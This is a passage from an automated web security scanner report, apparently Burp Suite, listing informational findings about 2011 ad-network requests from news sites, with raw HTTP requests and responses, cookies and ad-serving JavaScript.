http://ad.doubleclick.net/adj/N3093.150834.0497248606521/B5801515.10;abr=!ie;sz=728x90;ord=3730451366222604100?;click=http://r.turn.com/r/formclick/id/RKeRt8A5xTO9bgoAAgIBAA/url/;

Request

GET /server/ads.js?pub=5766351&cch=5766918&code=5766926&l=728x90&aid=26912083&ahcid=2168938&bimpd=pCreIYJavyNiKT8OQHFCSnu-vORVAfADNWaIrVAJW9V1OJxo6MJDRlBTc3fVSGqORiXDRlomnL_mfAoVZXeCkL8wvAhJVp5vH1605NNaPKgd1x29xXl5OSgnSbh900QIFhYiHQW0teqBC570BVUfktff2qOd8TAuM1o70SLAMfwCKpFmO4iIlB0kM7YKTICsL7R4Llxu6gw1UDBG-W9xu9Cw1Mz4UX51ay3f8dUZrSSA7ScN_yzVCT_qn-_wh7GkjVBkWJOw8E0SsEBhkIDT30v0_tDzWZMCygX7uwRksdEjoCAUEtzyi3w02uZQh4CPlbbQCKaV1kCXC1z-_nrIRv3Dt_DOnJ6szh2BeUfdUcDG-dcfe7AZKpps-jRxx503w5ouEVi7AI_5bXPRNdcP8QFcyCrv21DOcZZtn_24bXnbuGlDBbzSoryu0WxJZt3-TbjA4JdW6zB8Hr71jKGygnf979g2SfUVLE2EEGA1_P18fHSjIFmLLv9mvWkjikr6tE1_pTGVcNndvBjk5O8WpORSUX8h57ktArQiQRf_VM7suSEszTFtXJTNBWjhIyl4HF2axn5veQQlnqlFyRkks1_f7KC3VLmRxk7zb_BZDIJlqbhnVBeCxCmDhdk0jNpMHiPyrAZz5UKLC_VL_S0H0uZu9JsuecfTkRFyKcv1KqxdXU0tBSOr2Azj03ZXjmB-xXJHA51HCyRbV39W-BZaYUYafA0sG2GU1QMSEGn7mGlP_0gfI5Dj0uZ98BGVjFp-ixyNrFPa4sCVYWwv6KsGYXxI4IYGMiYon4s4QKZwiq1HQL2uATEn9inEHrl7lClpZsz5pj9OB5Dloc6omzDygRQ_CVxmcL7l1mtL_HnfnUZw--1JIlgG4EVQJnxieWB1EvmONAwrRCaTz4lB29IygQ&acp=F2A40808BF222937&rtbacid=b955a540e6a0f13e962aa5535b75fe6909df734c HTTP/1.1
Host: ad.turn.com
Proxy-Connection: keep-alive
Referer: http://optimized-by.rubiconproject.com/a/4462/5032/7102-2.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: rrs=undefined%7Cundefined%7Cundefined%7C4%7Cundefined%7C6; rds=undefined%7Cundefined%7Cundefined%7C15221%7Cundefined%7C15221; rv=1; uid=2925993182975414771; fc=CP-kOX4iOSzQzmzsKgiCelsouvdm86lAqkJC4JDCvS1ZP8p8LWiVlYWj8mwoyMJnM74tT5yNflT44pP1rbQUdr3wc-cQ7FRKnITKYzO3zYV52dhK4dSErN9-EcLOAtq0

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
P3P: policyref="/w3c/p3p.xml", CP="NOI CURa DEVa TAIa PSAa PSDa IVAa IVDa OUR IND UNI NAV"
Cache-Control: public
Cache-Control: max-age=172800
Cache-Control: must-revalidate
Expires: Tue, 06 Sep 2011 00:55:29 GMT
Set-Cookie: uid=8397588332178697252; Domain=.turn.com; Expires=Fri, 02-Mar-2012 00:55:29 GMT; Path=/
Set-Cookie: bp=""; Domain=.turn.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: bd=""; Domain=.turn.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: pf=""; Domain=.turn.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: adImpCount=""; Domain=.turn.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: fc=yKjiBNFeYaCqBQq9EKX_XuOtvx43KJO5Y8uCXkaobqPJxmeG753N3cyfpzvDjP2CWiAAKoJnCDlt6qAwGNpdjSA6EiGqn4ODhEiNrN01Etji3Sy-PEwXW67DoFr3mtCG; Domain=.turn.com; Expires=Fri, 02-Mar-2012 00:55:29 GMT; Path=/
Content-Type: text/javascript;charset=UTF-8
Vary: Accept-Encoding
Date: Sun, 04 Sep 2011 00:55:28 GMT
Content-Length: 10285

var detect = navigator.userAgent.toLowerCase();

function checkIt(string) {
   return detect.indexOf(string) >= 0;
}

var naturalImages = new Array;

naturalImageOnLoad = function() {
   if (this.width
...[SNIP]...
.util.getRequestParameter;var FlashObject=deconcept.SWFObject;var SWFObject=deconcept.SWFObject;

document.write('\n\n\n    \n\n     \n    \n        \n        \n            \n    \n    \n\n\n\n\n\n\n        \n        \n    \n                \n            \n            \n                \n                <IFRAME SRC="http://ad.doubleclick.net/adi/N3093.150834.0497248606521/B5801515.10;sz=728x90;ord=3730451366222604100?;click=http://r.turn.com/r/formclick/id/RKeRt8A5xTO9bgoAAgIBAA/url/;" WIDTH=728 HEIGHT=90 MARGINWIDTH=0 MARGINHEIGHT=0 HSPACE=0 VSPACE=0 FRAMEBORDER=0 SCROLLING=no BORDERCOLOR=\'#000000\'>\n<SCRIPT language=\'JavaScript1.1\' SRC="http://ad.doubleclick.net/adj/N3093.150834.0497248606521/B5801515.10;abr=!ie;sz=728x90;ord=3730451366222604100?;click=http://r.turn.com/r/formclick/id/RKeRt8A5xTO9bgoAAgIBAA/url/;">\n</SCRIPT>
...[SNIP]...
<A HREF="http://r.turn.com/r/formclick/id/RKeRt8A5xTO9bgoAAgIBAA/url/http://ad.doubleclick.net/jump/N3093.150834.0497248606521/B5801515.10;abr=!ie4;abr=!ie5;sz=728x90;ord=3730451366222604100?">\n<IMG SRC="http://ad.doubleclick.net/ad/N3093.150834.0497248606521/B5801515.10;abr=!ie4;abr=!ie5;sz=728x90;ord=3730451366222604100?" BORDER=0 WIDTH=728 HEIGHT=90 ALT="Advertisement"></A>
...[SNIP]...

18.7. http://ad.yieldmanager.com/pixel previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://ad.yieldmanager.com
Path:	/pixel

Issue detail

The page was loaded from a URL containing a query string:

http://ad.yieldmanager.com/pixel?&id=1282674&id=1239839&id=1415271&id=950991&id=1198835&id=1283938&id=1416226&id=1361950&id=1342492&id=1250690&id=1224511&id=1364793&id=1364633&id=1187608&id=698998&id=1023063&id=1357445&id=1416227&id=939893&id=956404&id=1294447&id=1415270&id=1198834&id=1253950&id=1210932&id=1188217&id=956405&id=1398249&id=1320775&id=1050626&id=1349763&t=1

The response contains the following links to other domains:

http://www.googleadservices.com/pagead/conversion/1033191019/?label=5n2yCJ3M-wEQ6_zU7AM&guid=ON&script=0
http://www.googleadservices.com/pagead/conversion/1049525132/?label=3CLYCPCM3AEQjPe59AM&guid=ON&script=0
http://www.googleadservices.com/pagead/conversion/1049525132/?label=SETJCLC0lAIQjPe59AM&guid=ON&script=0
http://www.googleadservices.com/pagead/conversion/1049525132/?label=SWqcCPC66QEQjPe59AM&guid=ON&script=0

Request

GET /pixel?&id=1282674&id=1239839&id=1415271&id=950991&id=1198835&id=1283938&id=1416226&id=1361950&id=1342492&id=1250690&id=1224511&id=1364793&id=1364633&id=1187608&id=698998&id=1023063&id=1357445&id=1416227&id=939893&id=956404&id=1294447&id=1415270&id=1198834&id=1253950&id=1210932&id=1188217&id=956405&id=1398249&id=1320775&id=1050626&id=1349763&t=1 HTTP/1.1
Host: ad.yieldmanager.com
Proxy-Connection: keep-alive
Referer: http://optimized-by.rubiconproject.com/a/4462/5032/7102-2.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: uid=uid=dd24a7d4-d3d5-11e0-8d9f-78e7d1fad490&_hmacv=1&_salt=2478993672&_keyid=k1&_hmac=b96a3af4c1f9c52f33944d31e2827ff5a044729b; bh="b!!!!V!!-O3!!!!#=3G@^!!Os7!!!!#=3G@^!!`4x!!!!$=3Ef#!!jBx!!!!#=2srH!!y)?!!!!#=3*$x!#%v(!!!!#=3*$x!#0Db!!!!#=3*$x!#2Rm!!!!#=3*$x!#83a!!!!#=3*$x!#83b!!!!#=35g_!#8TD!!!!#=3*$x!#N[5!!!!#=3!ea!#UD`!!!!$=3**U!#WZE!!!!#=3*$x!#YCf!!!!#=35g_!#YQK!!!!#=3@yl!#Z8E!!!!#=3G@^!#bw^!!!!#=3G@^!#eP^!!!!#=3*$x!#fBj!!!!#=3G@^!#fBk!!!!#=3G@^!#fBl!!!!#=3G@^!#fBm!!!!#=3G@^!#fBn!!!!#=3G@^!#fG+!!!!#=3G@^!#k[]!!!!#=3!ea!#k[_!!!!#=35g_!#qMq!!!!#=3GDG!#v-#!!!!#=3*$x!$%sF!!!!#=3!ea!$%sH!!!!#=35g_!$%uX!!!!#=35g_!$%vg!!!!#=3!ea!$%vi!!!!#=35g_!$(!P!!!!#=3G@^!$)gB!!!!#=3*$x!$*9h!!!!#=35g_!$+2e!!!!#=3!ea!$+2h!!!!#=35g_!$,jv!!!!#=3!ea!$.TJ!!!!#=3!ea!$.TK!!!!#=35g_!$1:.!!!!#=3!ea!$3Dm!!!!#=3*4J!$3IO!!!!#=3G@^!$3y-!!!!'=2v<]!$7w'!!!!#=3*4K!$9_!!!!!#=3!ea!$:3]!!!!#=3!ea!$<DI!!!!#=3G@^"

Response

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 00:55:42 GMT
Server: YTS/1.18.4
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID CURa ADMa DEVa PSAa PSDa OUR BUS COM INT OTC PUR STA"
Set-Cookie: bh="b!!!!v!!-O3!!!!#=3G@^!!Os7!!!!#=3G@^!!`4x!!!!$=3Ef#!!jBx!!!!#=2srH!!y)?!!!!#=3*$x!#%v(!!!!#=3*$x!#.dO!!!!$=3GJ/!#0Db!!!!#=3*$x!#2Rm!!!!#=3*$x!#83a!!!!#=3*$x!#83b!!!!#=35g_!#8TD!!!!#=3*$x!#N[5!!!!#=3!ea!#Q*T!!!!$=3GJ/!#RY.!!!!$=3GJ/!#SCj!!!!$=3GJ/!#SCk!!!!$=3GJ/!#UD`!!!!$=3**U!#WZE!!!!#=3*$x!#YCf!!!!#=35g_!#YQK!!!!#=3@yl!#Z8E!!!!#=3G@^!#]W%!!!!$=3GJ/!#aG>!!!!$=3GJ/!#bw^!!!!#=3G@^!#eP^!!!!#=3*$x!#fBj!!!!#=3G@^!#fBk!!!!#=3G@^!#fBl!!!!#=3G@^!#fBm!!!!#=3G@^!#fBn!!!!#=3G@^!#fG+!!!!#=3G@^!#k[]!!!!#=3!ea!#k[_!!!!#=35g_!#qMq!!!!#=3GDG!#tCn!!!!$=3GJ/!#tK$!!!!$=3GJ/!#ust!!!!$=3GJ/!#usu!!!!$=3GJ/!#v-#!!!!#=3*$x!#wW9!!!!$=3GJ/!#yM#!!!!$=3GJ/!$#WA!!!!$=3GJ/!$%,!!!!!$=3GJ/!$%SB!!!!$=3GJ/!$%sF!!!!#=3!ea!$%sH!!!!#=35g_!$%uX!!!!#=35g_!$%vg!!!!#=3!ea!$%vi!!!!#=35g_!$(!P!!!!#=3G@^!$)gB!!!!#=3*$x!$*9h!!!!#=35g_!$*Q<!!!!$=3GJ/!$*a0!!!!$=3GJ/!$+2e!!!!#=3!ea!$+2h!!!!#=35g_!$,0h!!!!$=3GJ/!$,jv!!!!#=3!ea!$.TJ!!!!#=3!ea!$.TK!!!!#=35g_!$/iQ!!!!$=3GJ/!$1:.!!!!#=3!ea!$2j$!!!!$=3GJ/!$3Dm!!!!#=3*4J!$3IO!!!!#=3G@^!$3jT!!!!$=3GJ/!$3y-!!!!'=2v<]!$4ou!!!!$=3GJ/!$5Nu!!!!$=3GJ/!$5oO!!!!$=3GJ/!$5qE!!!!$=3GJ/!$7w'!!!!#=3*4K!$9_!!!!!#=3!ea!$:3]!!!!#=3!ea!$:Py!!!!$=3GJ/!$<DI!!!!#=3G@^!$=p7!!!!$=3GJ/!$=p8!!!!$=3GJ/!$>#M!!!!$=3GJ/!$>#N!!!!$=3GJ/"; path=/; expires=Tue, 03-Sep-2013 00:55:42 GMT
Cache-Control: no-store
Last-Modified: Sun, 04 Sep 2011 00:55:42 GMT
Pragma: no-cache
Content-Length: 660
Content-Type: application/x-javascript
Age: 0
Proxy-Connection: close

document.write('<img height="1" width="1" src="http://www.googleadservices.com/pagead/conversion/1049525132/?label=SETJCLC0lAIQjPe59AM&guid=ON&script=0" />');
document.write('<img height="1" width="1" src="http://www.googleadservices.com/pagead/conversion/1033191019/?label=5n2yCJ3M-wEQ6_zU7AM&guid=ON&script=0" />');
document.write('<img height="1" width="1" src="http://www.googleadservices.com/pagead/conversion/1049525132/?label=SWqcCPC66QEQjPe59AM&guid=ON&script=0" />');
document.write('<img height="1" width="1" src="http://www.googleadservices.com/pagead/conversion/1049525132/?label=3CLYCPCM3AEQjPe59AM&guid=ON&script=0" />');

18.8. http://c.casalemedia.com/c/1/1/89733/http://altfarm.mediaplex.com/ad/ck/10105-135615-9432-62 previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://c.casalemedia.com
Path:	/c/1/1/89733/http://altfarm.mediaplex.com/ad/ck/10105-135615-9432-62

Issue detail

The page was loaded from a URL containing a query string:

http://c.casalemedia.com/c/1/1/89733/http://altfarm.mediaplex.com/ad/ck/10105-135615-9432-62?mpt=357951025

The response contains the following link to another domain:

http://altfarm.mediaplex.com/ad/ck/10105-135615-9432-62?mpt=357951025

Request

Response

18.9. http://cdn.optmd.com/V2/89733/235451/index.html previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://cdn.optmd.com
Path:	/V2/89733/235451/index.html

Issue detail

The page was loaded from a URL containing a query string:

http://cdn.optmd.com/V2/89733/235451/index.html?g=Af////8=&r=www.sacbee.com/2011/09/03/3883102/sprint-could-be-winner-in-thwarted.html

The response contains the following links to other domains:

http://altfarm.mediaplex.com/ad/js/10105-135615-9432-62?mpt=357951025&mpvc=http://c.casalemedia.com/c/1/1/89733/
http://i.casalemedia.com/imp.gif?c=89733&cr=235451

Request

GET /V2/89733/235451/index.html?g=Af////8=&r=www.sacbee.com/2011/09/03/3883102/sprint-could-be-winner-in-thwarted.html HTTP/1.1
Host: cdn.optmd.com
Proxy-Connection: keep-alive
Referer: http://www.sacbee.com/2011/09/03/3883102/sprint-could-be-winner-in-thwarted.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Server: Apache
Last-Modified: Fri, 02 Sep 2011 20:55:36 GMT
ETag: "ce5613-1a3-4abfb95404200"
Accept-Ranges: bytes
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR DEVa TAIa OUR BUS UNI"
Content-Type: text/html; charset=UTF-8
Vary: Accept-Encoding
Date: Sun, 04 Sep 2011 00:52:58 GMT
Content-Length: 419
Connection: close

<html>
<head><meta http-equiv="CACHE-CONTROL" content="NO-CACHE" /><title>Personal Creations</title></head>
<body style="margin: 0px; padding: 0px;">
<script type="text/javascript" src="http://altfarm.mediaplex.com/ad/js/10105-135615-9432-62?mpt=357951025&mpvc=http://c.casalemedia.com/c/1/1/89733/"></script>
<img src="http://i.casalemedia.com/imp.gif?c=89733&cr=235451" width="1" height="1" alt="" />
</body>
...[SNIP]...

18.10. http://cm.g.doubleclick.net/pixel previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://cm.g.doubleclick.net
Path:	/pixel

Issue detail

The page was loaded from a URL containing a query string:

http://cm.g.doubleclick.net/pixel?nid=audsci

The response contains the following link to another domain:

http://pix04.revsci.net/D08734/a1/0/0/0.gif?D=DM_LOC%3Dhttp%253A%252F%252Fgoogle.com%252F0.gif%253Fid%253DCAESEOfruwaKEzWGvrIKzVwqd-c&cver=1

Request

GET /pixel?nid=audsci HTTP/1.1
Host: cm.g.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://content.usatoday.com/communities/campusrivalry/topics
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=229b025847010047||t=1314754416|et=730|cs=002213fd48ab1c4d1bf867f0d1

Response

HTTP/1.1 302 Found
Location: http://pix04.revsci.net/D08734/a1/0/0/0.gif?D=DM_LOC%3Dhttp%253A%252F%252Fgoogle.com%252F0.gif%253Fid%253DCAESEOfruwaKEzWGvrIKzVwqd-c&cver=1
Cache-Control: no-store, no-cache
Pragma: no-cache
Date: Sun, 04 Sep 2011 00:47:57 GMT
Content-Type: text/html; charset=UTF-8
Server: Cookie Matcher
Content-Length: 341
X-XSS-Protection: 1; mode=block

<HTML><HEAD><meta http-equiv="content-type" content="text/html;charset=utf-8">
<TITLE>302 Moved</TITLE></HEAD><BODY>
<H1>302 Moved</H1>
The document has moved
<A HREF="http://pix04.revsci.net/D08734/a1/0/0/0.gif?D=DM_LOC%3Dhttp%253A%252F%252Fgoogle.com%252F0.gif%253Fid%253DCAESEOfruwaKEzWGvrIKzVwqd-c&cver=1">here</A>
...[SNIP]...

18.11. http://cm.g.doubleclick.net/pixel previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://cm.g.doubleclick.net
Path:	/pixel

Issue detail

The page was loaded from a URL containing a query string:

http://cm.g.doubleclick.net/pixel?nid=turn1

The response contains the following link to another domain:

http://r.turn.com/r/bd?ddc=1&pid=18&uid=CAESEJ1u_nXPeXgxS3LGeCpc9xE&cver=1

Request

GET /pixel?nid=turn1 HTTP/1.1
Host: cm.g.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://cdn.turn.com/server/ddc.htm?uid=2925993182975414771&mktid=27&mpid=3808468&fpid=-1&rnd=7044539534532983673&nu=n&sp=n&ctid=1
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=229b025847010047||t=1314754416|et=730|cs=002213fd48ab1c4d1bf867f0d1

Response

HTTP/1.1 302 Found
Location: http://r.turn.com/r/bd?ddc=1&pid=18&uid=CAESEJ1u_nXPeXgxS3LGeCpc9xE&cver=1
Cache-Control: no-store, no-cache
Pragma: no-cache
Date: Sun, 04 Sep 2011 00:48:08 GMT
Content-Type: text/html; charset=UTF-8
Server: Cookie Matcher
Content-Length: 283
X-XSS-Protection: 1; mode=block

<HTML><HEAD><meta http-equiv="content-type" content="text/html;charset=utf-8">
<TITLE>302 Moved</TITLE></HEAD><BODY>
<H1>302 Moved</H1>
The document has moved
<A HREF="http://r.turn.com/r/bd?ddc=1&pid=18&uid=CAESEJ1u_nXPeXgxS3LGeCpc9xE&cver=1">here</A>
...[SNIP]...

18.12. http://cm.npc-mcclatchy.overture.com/js_1_0/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://cm.npc-mcclatchy.overture.com
Path:	/js_1_0/

Issue detail

The page was loaded from a URL containing a query string:

http://cm.npc-mcclatchy.overture.com/js_1_0/?config=1001507650&type=news&ctxtId=news&keywordCharEnc=utf8&source=npc_mcclatchy_sacramentobee_t2_ctxt&adwd=728&adht=90&ctxtUrl=http%3A%2F%2Fblogs.sacbee.com%2Fthe_state_worker%2F%23navlink%3Dnavdrop&ctxtCat=news&outputCharEnc=latin1&css_url=http://static.mcclatchyinteractive.com/static/styles/mi/third_party/yahoo/yahoo.css&tg=1&refUrl=http%3A%2F%2Fwww.sacbee.com%2F2011%2F09%2F03%2F3883102%2Fsprint-could-be-winner-in-thwarted.html&du=1&cb=1315097337736&ctxtContent=%3Chead%3E%3Cscript%20async%3D%22%22%20src%3D%22http%3A%2F%2Fwww.publish2.com%2Fnewsgroups%2Fstate-worker.js%3Fjsonp_callback%3DjQuery15205311797398608178_1315097321812%26amp%3B_%3D1315097336789%22%3E%3C%2Fscript%3E%3Cscript%20async%3D%22%22%20src%3D%22http%3A%2F%2Fapi.twitter.com%2F1%2Fstatuses%2Fuser_timeline.json%3Fscreen_name%3DTheStateWorker%26amp%3Bcallback%3DjQuery15205311797398608178_1315097321811%26amp%3B_%3D1315097336786%22%3E%3C%2Fscript%3E%0A%20%20%20%20%3Cscript%20type%3D%22text%2Fjavascript%22%20async%3D%22%22%20src%3D%22http%3A%2F%2Fwww.scribd.com%2Fjavascripts%2Fembed_code%2Finject.js%22%3E%3C%2Fscript%3E%3Cscript%20type%3D%22text%2Fjavascript%22%3E%0A%20%20

The response contains the following link to another domain:

http://static.mcclatchyinteractive.com/static/styles/mi/third_party/yahoo/yahoo.css

Request

GET /js_1_0/?config=1001507650&type=news&ctxtId=news&keywordCharEnc=utf8&source=npc_mcclatchy_sacramentobee_t2_ctxt&adwd=728&adht=90&ctxtUrl=http%3A%2F%2Fblogs.sacbee.com%2Fthe_state_worker%2F%23navlink%3Dnavdrop&ctxtCat=news&outputCharEnc=latin1&css_url=http://static.mcclatchyinteractive.com/static/styles/mi/third_party/yahoo/yahoo.css&tg=1&refUrl=http%3A%2F%2Fwww.sacbee.com%2F2011%2F09%2F03%2F3883102%2Fsprint-could-be-winner-in-thwarted.html&du=1&cb=1315097337736&ctxtContent=%3Chead%3E%3Cscript%20async%3D%22%22%20src%3D%22http%3A%2F%2Fwww.publish2.com%2Fnewsgroups%2Fstate-worker.js%3Fjsonp_callback%3DjQuery15205311797398608178_1315097321812%26amp%3B_%3D1315097336789%22%3E%3C%2Fscript%3E%3Cscript%20async%3D%22%22%20src%3D%22http%3A%2F%2Fapi.twitter.com%2F1%2Fstatuses%2Fuser_timeline.json%3Fscreen_name%3DTheStateWorker%26amp%3Bcallback%3DjQuery15205311797398608178_1315097321811%26amp%3B_%3D1315097336786%22%3E%3C%2Fscript%3E%0A%20%20%20%20%3Cscript%20type%3D%22text%2Fjavascript%22%20async%3D%22%22%20src%3D%22http%3A%2F%2Fwww.scribd.com%2Fjavascripts%2Fembed_code%2Finject.js%22%3E%3C%2Fscript%3E%3Cscript%20type%3D%22text%2Fjavascript%22%3E%0A%20%20 HTTP/1.1
Host: cm.npc-mcclatchy.overture.com
Proxy-Connection: keep-alive
Referer: http://blogs.sacbee.com/the_state_worker/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: BX=228g5ih765ieg&b=3&s=bh; UserData=02u3hs9yoaLQsFTjBpNDM2dzC3MXI0MLCyMzRSME%2bLSi4sTU1JNbEBAGNDYyNXQxNTZ0MAZ7BMtQw=

Response

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 01:03:14 GMT
P3P: policyref="http://info.yahoo.com/w3c/p3p.xml", CP="CAO DSP COR CUR ADM DEV TAI PSA PSD IVAi IVDi CONi TELo OTPi OUR DELi SAMi OTRi UNRi PUBi IND PHY ONL UNI PUR FIN COM NAV INT DEM CNT STA POL HEA PRE LOC GOV"
Set-Cookie: UserData=02u3hs9yoaLQsFTjBpNDM2dzC3MXI0MLCyMzRSME%2bLSi4sTU1JNbEBAGNDYyM3QzdTZwMAR/lMxQw=; Domain=.overture.com; Path=/; Max-Age=315360000; Expires=Wed, 01-Sep-2021 01:03:14 GMT
Cache-Control: no-cache, private
Pragma: no-cache
Expires: 0
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=ISO-8859-1
Content-Length: 814

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html>

<head>
<base target="_blank">
<meta http-equiv="Content-Type" content="text/html; charse
...[SNIP]...
</title>

<link rel="stylesheet" href="http://static.mcclatchyinteractive.com/static/styles/mi/third_party/yahoo/yahoo.css" type="text/css">
<style type="text/css">
...[SNIP]...

18.13. http://cms.ad.yieldmanager.net/v1/cms previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://cms.ad.yieldmanager.net
Path:	/v1/cms

Issue detail

The page was loaded from a URL containing a query string:

http://cms.ad.yieldmanager.net/v1/cms?esig=1~862d802dd86fb59368388ad078a7f298ddbbd0b7&nwid=10000424978&sigv=1

The response contains the following link to another domain:

http://r.turn.com/r/cms/id/0/ddc/1/pid/43/uid/?xid=u02DzKG_.KFBo5S2yyqljPCE

Request

GET /v1/cms?esig=1~862d802dd86fb59368388ad078a7f298ddbbd0b7&nwid=10000424978&sigv=1 HTTP/1.1
Host: cms.ad.yieldmanager.net
Proxy-Connection: keep-alive
Referer: http://cdn.turn.com/server/ddc.htm?uid=2925993182975414771&mktid=27&mpid=3808468&fpid=-1&rnd=7044539534532983673&nu=n&sp=n&ctid=1
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: BX=ei08qcd75vc4d&b=3&s=8s&t=245

Response

HTTP/1.1 302 Found
Date: Sun, 04 Sep 2011 00:56:33 GMT
P3P: policyref="http://info.yahoo.com/w3c/p3p.xml", CP="CAO DSP COR CUR ADM DEV TAI PSA PSD IVAi IVDi CONi TELo OTPi OUR DELi SAMi OTRi UNRi PUBi IND PHY ONL UNI PUR FIN COM NAV INT DEM CNT STA POL HEA PRE LOC GOV"
Location: http://r.turn.com/r/cms/id/0/ddc/1/pid/43/uid/?xid=u02DzKG_.KFBo5S2yyqljPCE
Cache-Control: private
Connection: close
Content-Type: text/plain; charset=utf-8
Content-Length: 792

HTTP/1.1 302 Found
Date: Sun, 04 Sep 2011 00:56:33 GMT
P3P: policyref="http://info.yahoo.com/w3c/p3p.xml", CP="CAO DSP COR CUR ADM DEV TAI PSA PSD IVAi IVDi CONi TELo OTPi OUR DELi SAMi OTRi UNRi PU
...[SNIP]...
n.com/r/cms/id/0/ddc/1/pid/43/uid/?xid=u02DzKG_.KFBo5S2yyqljPCE
Cache-Control: private
Connection: close
Transfer-Encoding: chunked
Content-Type: text/html; charset=utf-8

The document has moved <A HREF="http://r.turn.com/r/cms/id/0/ddc/1/pid/43/uid/?xid=u02DzKG_.KFBo5S2yyqljPCE">here</A>
...[SNIP]...

18.14. http://gannett.gcion.com/addyn/3.0/5111.1/778079/0/-1/ADTECH previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://gannett.gcion.com
Path:	/addyn/3.0/5111.1/778079/0/-1/ADTECH

Issue detail

The page was loaded from a URL containing a query string:

http://gannett.gcion.com/addyn/3.0/5111.1/778079/0/-1/ADTECH;alias=content.usatoday.com/communities/campusrivalry_Bottom728x90;cookie=info;loc=100;target=_blank;grp=22926;misc=1315097316264;noperf=1;size=728x90;key=College+Athletes+Teams+Coaches+More+Campus+Rivalry+Topics+USATODAYcom;kvtitle=College-Athletes-Teams-Coaches--More-Campus-Rivalry-Topics---USATODAYcom

The response contains the following link to another domain:

http://optimized-by.rubiconproject.com/a/4462/5032/'+rubSect+'-2.html

Request

GET /addyn/3.0/5111.1/778079/0/-1/ADTECH;alias=content.usatoday.com/communities/campusrivalry_Bottom728x90;cookie=info;loc=100;target=_blank;grp=22926;misc=1315097316264;noperf=1;size=728x90;key=College+Athletes+Teams+Coaches+More+Campus+Rivalry+Topics+USATODAYcom;kvtitle=College-Athletes-Teams-Coaches--More-Campus-Rivalry-Topics---USATODAYcom HTTP/1.1
Host: gannett.gcion.com
Proxy-Connection: keep-alive
Referer: http://content.usatoday.com/communities/campusrivalry/topics
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: CfP=1; JEB2=4E62BFAA6E651A4418BD90FFF0005EB9; rsi_segs=

Response

HTTP/1.1 200 OK
Server: Adtech Adserver
Cache-Control: no-cache
Content-Type: application/x-javascript
Content-Length: 941
Date: Sun, 04 Sep 2011 00:48:05 GMT
Age: 0
Connection: close

rubSect = "";
if (window.location.pathname.indexOf("life") != -1) rubSect = 7103;
else if (window.location.pathname.indexOf("auto") != -1) rubSect = 7208;
else if (window.location.pathname.indexOf("mo
...[SNIP]...
ubSect = 7106;
else if (window.location.pathname.indexOf("tech") != -1) rubSect = 7107;
else if (window.location.pathname.indexOf("weather") != -1) rubSect = 7108;
else rubSect = 7102;
